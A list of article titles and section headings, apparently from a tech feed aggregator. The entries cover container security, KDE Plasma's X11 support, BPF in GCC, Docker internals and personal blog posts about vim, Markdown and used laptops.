What’s in the container? Analyzing vulnerabilities, risks and protection with Kaspersky Container Security and the KIRA AI assistant

Introduction

Software vulnerabilities and compromise of update sources

Configuration vulnerabilities

Insecure handling of credentials

Use of default passwords

Passing passwords via command arguments

Privilege escalation in the container

Attacks on sudo

Insecure file permissions

Lack of integrity checks

Conclusion

EX-11: Prepping for Plasma’s Last X11-Supported Release – David Edmundson's Web Log

When does it take effect?

What's Changed?

What's stayed the same?

What's Next?

How Ready Are We?

Still Have Issues with Wayland on 6.7?

BPF support in GCC 16 and beyond [LWN.net]

Welcome to LWN.net

CO-RE problems

Types and optimization

Why I love vim

100 Days to Offload 2025 - Day 42

Used laptops are wonderful... except when you need batteries

A dramatization:

100 Days to Offload 2025 - Day 23

Why I love Markdown

Some History, or: I have ADHD and we're all aboard the unnecessary detail traaaaaainnnn!......

Before markdown: can you wiki wiki that for me me?

Your text, your way

100 Days to Offload 2025 - Day 20

Docker Internal (2)

1. Pull an Image

1.1. Setup Environment

1.2. Auth & HEAD Manifest

1.3. GET Image Index

1.4. Download Manifest & Blob

1.5. Save The File

2. Unpack an Image

2.1. dockerd side

2.2. Create A Snapshot

2.3. containerd Apply Handling

2.4. untar